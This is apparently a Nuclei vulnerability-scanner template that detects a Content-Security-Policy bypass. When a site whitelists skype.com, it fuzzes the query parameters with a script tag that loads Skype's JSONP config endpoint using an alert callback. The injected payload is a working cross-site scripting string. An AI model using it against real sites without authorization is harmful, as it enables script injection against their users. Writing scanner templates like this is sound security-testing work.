id: skype-config-csp-bypass

info:
  name: Content-Security-Policy Bypass via Skype Config
  author: renniepak,DhiyaneshDK
  severity: medium
  reference:
    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
  metadata:
    verified: true
  tags: xss,csp-bypass,skype-config

flow: http(1) && headless(1)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        part: header
        words:
          - "Content-Security-Policy"
          - "skype.com"
        condition: and
        internal: true

headless:
  - steps:
      - action: navigate
        args:
          url: "{{BaseURL}}"

      - action: waitdialog
        name: skype_config_csp_xss
        args:
          max-duration: 5s

    payloads:
      injection:
        - '<script src="https://a.config.skype.com/config/v1/SkypeLyncWebExperience/905_1.2.5.0?apikey=shareButton&fingerprint=0487c2fb-967c-4d8d-9635-75249326f72e&callback=alert"></script>'

    fuzzing:
      - part: query
        type: replace
        mode: single
        fuzz:
          - "{{url_encode(injection)}}"

    matchers:
      - type: dsl
        dsl:
          - "skype_config_csp_xss == true"
# digest: 4a0a00473045022100f8b0af4e313a6a6b0fb830a92d3c78e97681d2e7eb76d28233988ae4e3723e4d02205472b3e0cf01cd77c7919e642838a3789c84a2317718d2ee6db0abd4e4c37e4e:922c64590222798bb761d5b6d8e72950